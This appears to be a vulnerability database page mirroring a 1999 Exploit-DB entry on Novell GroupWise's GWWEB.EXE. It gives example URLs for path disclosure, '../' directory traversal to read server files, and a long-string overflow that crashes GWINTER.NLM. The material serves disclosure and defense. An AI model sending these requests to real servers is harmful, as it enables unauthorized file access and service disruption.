Lucene search
K

Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities

🗓️ 19 Dec 1999 00:00:00Reported by Sacha Faust BourqueType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Multiple vulnerabilities in GWWEB.EXE allow path disclosure, directory traversal, and potential code execution.

Code
Netscape Enterprise Server for NetWare 4/5 3.0.7 a,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities

source: https://www.securityfocus.com/bid/879/info

The HELP function in GWWEB.EXE will reveal the path of the server, and combined with the '../' string, allow read access for any client to any .htm file on the server, as well as browseable directory listings.

Also, it is possible to abend GWINTER.NLM by specifying a long string where the server expects a variable setting. 

Requesting the following URL from the GroupWise server
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=asdf
will return the error message:
Could not read file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\ASDF.HTM
revealing the full path of the GroupWise server software.
Note: The URL above may need to be tailored to the target system.

To read .htm files anywhere on the server, or to browse directories, use HELP and the ../ string to traverse directories, for example:
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm
or
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../
Again, the paths shown above may need to be modified.

To abend GWINTER.NLM request a URL like:
http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars]
It may be possible to remotely execute arbitrary code via this buffer overflow.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation